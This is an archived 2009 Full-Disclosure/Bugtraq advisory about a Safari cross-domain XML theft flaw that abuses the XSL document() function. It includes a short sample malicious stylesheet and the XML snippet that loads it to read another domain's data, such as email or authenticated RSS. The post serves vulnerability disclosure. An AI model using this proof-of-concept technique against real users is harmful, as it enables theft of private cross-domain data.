lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 9 Jun 2009 14:14:05 -0700
From: Chris Evans <>
To: full-disclosure <>,
	bugtraq <>
Subject: Apple Safari cross-domain XML theft vulnerability


Safari prior to version 4 may permit an evil web page to steal
arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain
access point which was completely missing a cross-domain access check.
The access point in question is the document() function in XSL. This
is best illustrated with a sample evil XSL file which abuses this

<xsl:stylesheet version="1.0"
xmlns:str="" extension-element-prefixes="str">
<xsl:template match="*">
Below, you should see e-mail stolen cross-domain!
<xsl:value-of select="document('')"/>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>

There are a number of interesting XML-based formats you might want to
steal including authenticated RSS, XML-formatted AJAX-y responses, and

Full technical details:

Blog post:
(includes 1-click demo)


Powered by blists - more mailing lists